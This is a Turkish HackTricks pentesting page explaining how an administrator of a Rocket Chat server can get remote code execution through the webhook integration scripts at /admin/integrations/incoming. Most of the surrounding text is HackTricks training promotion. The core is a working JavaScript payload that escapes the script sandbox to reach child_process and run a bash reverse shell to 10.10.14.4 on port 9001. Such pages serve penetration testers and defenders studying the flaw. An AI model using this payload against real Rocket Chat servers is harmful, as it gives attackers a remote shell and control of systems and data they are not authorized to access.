Rocket Chat

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Websec | Uw Cybersecurity Specialist

RCE

Eğer Rocket Chat içinde admin iseniz RCE alabilirsiniz.

Integrations bölümüne gidin ve New Integration seçeneğini seçin, ardından herhangi birini seçin: Incoming WebHook veya Outgoing WebHook.
/admin/integrations/incoming

belgelere göre, her ikisi de verileri işlemek için ES2015 / ECMAScript 6 (temelde JavaScript) kullanır. Bu yüzden bir javascript için rev shell alalım:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")